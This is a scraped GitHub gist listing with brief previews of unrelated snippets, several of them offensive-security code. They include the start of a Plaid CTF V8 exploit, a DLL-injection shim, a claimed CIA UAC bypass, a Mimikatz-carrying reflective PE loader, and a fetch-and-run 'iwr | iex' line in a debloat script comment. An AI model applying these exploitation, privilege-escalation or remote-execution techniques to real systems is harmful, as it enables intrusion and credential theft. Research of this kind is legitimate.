vendettamit
/ ApplicationLoderFromNTService.cs
Created
May 24, 2013 13:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.ComponentModel; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| using System.Security; | |
| namespace Shared.ApplicationLoaderUtil | |
| { | |
| /// <summary> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Step 1: Enable capabilities "background fetch" | |
| Step2 : Setup AppDelegate.swift | |
| func application(application: UIApplication, didFinishLaunchingWithOptions launchOptions: [NSObject: AnyObject]?) -> Bool { | |
| let settings = UIUserNotificationSettings(forTypes: UIUserNotificationType.Alert, categories: nil) | |
| UIApplication.sharedApplication().registerUserNotificationSettings(settings) | |
| UIApplication.sharedApplication().setMinimumBackgroundFetchInterval(UIApplicationBackgroundFetchIntervalMinimum) | |
| return true; |
talwai
/ servefile.sh
Created
January 23, 2015 19:57
One-shot HTTP webserver to serve file contents using netcat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { echo -ne "HTTP/1.0 200 OK\r\nContent-Length: $(wc -c <some.file)\r\n\r\n"; cat some.file; } | nc -l 8080 |
alirobe
/ reclaimWindows10.ps1
Last active
July 3, 2024 09:36
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### | |
| ### | |
| ### UPDATE: For Win 11, I recommend using this tool in place of this script: | |
| ### https://christitus.com/windows-tool/ | |
| ### https://github.com/ChrisTitusTech/winutil | |
| ### https://www.youtube.com/watch?v=6UQZ5oQg8XA | |
| ### iwr -useb https://christitus.com/win | iex | |
| ### | |
| ### |
sroettger
/ js_sandbox.js
Created
April 17, 2016 21:09
Exploit for the js_sandbox challenge of Plaid CTF 2016
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| with (true) { | |
| // f() will allocate a buggy JSArray. The length is set to 24 but the capacity is only 16. | |
| // take a look at JSCreateLowering::ReduceJSCreateArray to see why this is happening | |
| function f(){ | |
| var x = 8; | |
| var y = 0xffffffff; | |
| var ind = x & y; | |
| x = 16; | |
| y = 0xffffffff; | |
| var ind2 = ind + (x&y); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| -------- dllinjshim.cpp -------- | |
| > cl /Fe:dllinjshim.exe dllinjshim.cpp | |
| > dllinjshim.exe | |
| > sdbinst moo.sdb | |
| /!\ On Windows 10 there is a new function `SdbIsKnownShimDll` called | |
| in `SdbGetDllPath` which will check the DLL name against the following list: |
hasherezade
/ syscall_extractor.cpp
Last active
August 30, 2023 21:47
Extracts syscalls list from NTDLL.DLL
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <Windows.h> | |
| // based on: https://www.evilsocket.net/2014/02/11/on-windows-syscall-mechanism-and-syscall-numbers-extraction-methods/ | |
| // author: @evilsocket | |
| // modified by: @hasherezade | |
| #define IS_ADDRESS_BETWEEN( left, right, address ) ( (address) >= (left) && (address) < (right) ) | |
| PIMAGE_SECTION_HEADER SectionByRVA( PIMAGE_SECTION_HEADER pSections, DWORD dwSections, DWORD rva ) | |
| { |
williballenthin
/ hint_calls.py
Last active
April 4, 2024 03:40
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| IDA plugin to display the calls and strings referenced by a function as hints. | |
| Installation: put this file in your %IDADIR%/plugins/ directory. | |
| Author: Willi Ballenthin <william.ballenthin@fireeye.com> | |
| Licence: Apache 2.0 | |
| ''' | |
| import idc | |
| import idaapi | |
| import idautils |
hfiref0x
/ gist:59c689a14f1fc2302d858ae0aa3f6b86
Created
May 27, 2017 06:30
CIA Stinger UAC bypass (likely)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DWORD Error, bytesIO; | |
| NTSTATUS Status; | |
| HANDLE hProcessToken = NULL, hNewToken = NULL, hTest; | |
| BOOL bCond = FALSE; | |
| SHELLEXECUTEINFO shinfo; | |
| SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY; | |
| TOKEN_MANDATORY_LABEL tml, *ptml; | |
| PSID pIntegritySid = NULL; | |
| STARTUPINFO si; | |
| PROCESS_INFORMATION pi; |
xorrior
/ PELoader.cs
Created
July 12, 2017 01:54
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.IO.Compression; | |
| using System.Text; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
OlderNewer